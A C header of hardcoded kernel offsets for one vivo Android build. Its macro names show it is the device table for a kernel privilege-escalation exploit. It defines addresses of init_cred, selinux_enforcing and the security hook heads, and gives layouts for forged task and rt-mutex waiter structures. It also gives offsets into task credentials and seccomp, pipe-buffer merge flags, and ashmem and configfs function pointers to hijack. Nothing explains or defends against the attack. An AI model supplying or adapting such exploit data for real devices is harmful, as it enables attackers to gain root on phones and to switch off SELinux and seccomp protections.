#ifndef OFFSET_H
#define OFFSET_H

#define BUILD_VARIANT_LABEL "neo8_pd2301_ab152"
#ifndef BUILD_FINGERPRINT
#define BUILD_FINGERPRINT "vivo/PD2301_A_16.3.16.1.W10.V000L1"
#endif

#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0x80000000ULL
#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END 0xffffff9000000000ULL
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END 0xffffff9000000000ULL
#define VMEMMAP_START 0xfffffffe00000000ULL

#define ASHMEM_MISC_FOPS_OFF 0x0255f830ULL
#define ASHMEM_FOPS_OFF 0x025b8a18ULL
#define ASHMEM_IOCTL_OFF 0x012a8cecULL
#define ASHMEM_COMPAT_IOCTL_OFF 0x012a939cULL
#define ASHMEM_MMAP_OFF 0x012a93fcULL
#define ASHMEM_OPEN_OFF 0x012a9640ULL
#define ASHMEM_RELEASE_OFF 0x012a96fcULL
#define ASHMEM_SHOW_FDINFO_OFF 0x012a985cULL
#define COPY_SPLICE_READ_OFF 0x0068d220ULL
#define CONFIGFS_READ_ITER_OFF 0x0075af94ULL
#define CONFIGFS_BIN_WRITE_ITER_OFF 0x0075b20cULL
#define NOOP_LLSEEK_OFF 0x0060f318ULL
#define INIT_TASK_OFF 0x02b2c280ULL
#define INIT_CRED_OFF 0x02b414b0ULL
#define ROOT_TASK_GROUP_OFF 0x02d78140ULL
#define SECURITY_HOOK_HEADS_OFF 0x025fc640ULL
#define SELINUX_BLOB_SIZES_OFF 0x025fccd8ULL
#define SELINUX_ENFORCING_OFF 0x02f09df0ULL
#define KMALLOC_CACHES_OFF 0x025fc178ULL
#define ANON_PIPE_BUF_OPS_OFF 0x02461568ULL
#define SLIDE_NFULNL_LOGGER_OFF 0x02b21720ULL
#define SLIDE_LOGGERS_0_1_OFF 0x02b21648ULL
#define SLIDE_INIT_TASK_OFF 0x02b2c280ULL
#define SLIDE_ROOT_TASK_GROUP_OFF 0x02d78140ULL
#define SLIDE_SYSCTL_BOOTID_OFF 0x02f292b5ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x02c88500ULL

// FAKE_TASK / WAITER / CFG / SECCOMP / PIPE / FOPS 全套 -- 同 arm64 5.10
#define WAITER_LOCAL_OFF 0x80
#define WAITER_TREE_ENTRY_OFF 0
#define WAITER_PI_TREE_ENTRY_OFF 24
#define WAITER_TASK_OFF 48
#define WAITER_LOCK_OFF 56
#define WAITER_WAKE_STATE_OFF 0x40
#define WAITER_PRIO_OFF 0x44
#define WAITER_DEADLINE_OFF 0x48
#define WAITER_WW_CTX_OFF 0x50
#define FAKE_WAITER_TREE_PRIO_OFF 24
#define FAKE_WAITER_TREE_DEADLINE_OFF 32
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 40
#define FAKE_WAITER_PI_TREE_PRIO_OFF 0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_TASK_OFF 0x50
#define FAKE_WAITER_LOCK_OFF 0x58
#define FAKE_WAITER_WAKE_STATE_OFF 0x60
#define FAKE_WAITER_WW_CTX_OFF 0x68
#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8C
#define FAKE_TASK_TASK_GROUP_OFF 0x348
#define FAKE_TASK_PI_LOCK_OFF 0x90C
#define FAKE_TASK_PI_WAITERS_OFF 0x920
#define FAKE_TASK_PI_TOP_TASK_OFF 0x930
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x938
#define CFG_PAGE_OFF 16
#define CFG_NEEDS_READ_FILL_OFF 0x50
#define CFG_BIN_BUFFER_OFF 0x58
#define CFG_BIN_BUFFER_SIZE_OFF 0x60
#define CFG_CB_MAX_SIZE_OFF 0x64
#define MM_OWNER_OFF 0x408
#define TASK_PID_OFF 0x618
#define TASK_TGID_OFF 0x61C
#define TASK_REAL_PARENT_OFF 0x628
#define TASK_ATOMIC_FLAGS_OFF 0x5D8
#define TASK_REAL_CRED_OFF 0x818
#define TASK_CRED_OFF 0x820
#define TASK_COMM_OFF 0x830
#define TASK_TASKS_OFF 0x550
#define TASK_THREAD_INFO_FLAGS_OFF 0
#define TASK_SECCOMP_OFF 0x8E8
#define CRED_UID_OFF 8
#define CRED_SECUREBITS_OFF 40
#define CRED_CAPS_OFF 48
#define CRED_SECURITY_OFF 0x80
#define SELINUX_CRED_BLOB_OFF 0
#define SELINUX_CRED_OSID_OFF 0
#define SELINUX_CRED_SID_OFF 4
#define SECCOMP_MODE_OFF 0
#define SECCOMP_FILTER_COUNT_OFF 4
#define SECCOMP_FILTER_OFF 8
#define TIF_SECCOMP_BIT 11
#define PFA_NO_NEW_PRIVS_BIT 0
#define STRUCT_PAGE_SIZE 0x48
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 8
#define STRUCT_SLAB_CACHE_OFF 24
#define STRUCT_PAGE_TYPE_OFF 48
#define PIPE_BUFFER_SIZE 40
#define PIPE_BUFFER_SLOTS 32
#define PIPE_BUF_FLAG_CAN_MERGE 16
#define FOPS_OWNER_OFF 0
#define FOPS_LLSEEK_OFF 8
#define FOPS_READ_OFF 16
#define FOPS_WRITE_OFF 24
#define FOPS_READ_ITER_OFF 32
#define FOPS_WRITE_ITER_OFF 40
#define FOPS_IOCTL_OFF 0x48
#define FOPS_COMPAT_IOCTL_OFF 0x50
#define FOPS_MMAP_OFF 0x58
#define FOPS_OPEN_OFF 0x68
#define FOPS_RELEASE_OFF 0x78
#define FOPS_SPLICE_READ_OFF 0xB8
#define FOPS_SHOW_FDINFO_OFF 0xD8
#define LOCK_OFF 0x1350
#define W0_OFF 0x2220
#define FOPS_OFF 0x1000
#define LEFT_OFF 0x100
#define RIGHT_OFF 0x118
#define SCRATCH_OFF 0x128
#define FAKE_TASK_OFF 0x128
#define MM_STRUCT_SZ 0x3C0
#define MM_ORDER 3

#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
#define SLIDE_NFULNL_LOGGER_IMAGE (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

#define ASHMEM_MISC_FOPS (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
#define ASHMEM_FOPS (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
#define ASHMEM_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
#define CONFIGFS_READ_ITER (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define COPY_SPLICE_READ (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define SECURITY_HOOK_HEADS (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define NOOP_LLSEEK (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define INIT_CRED (KIMAGE_TEXT_BASE + INIT_CRED_OFF)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_BLOB_SIZES (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define KMALLOC_CACHES (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)

#endif  // OFFSET_H
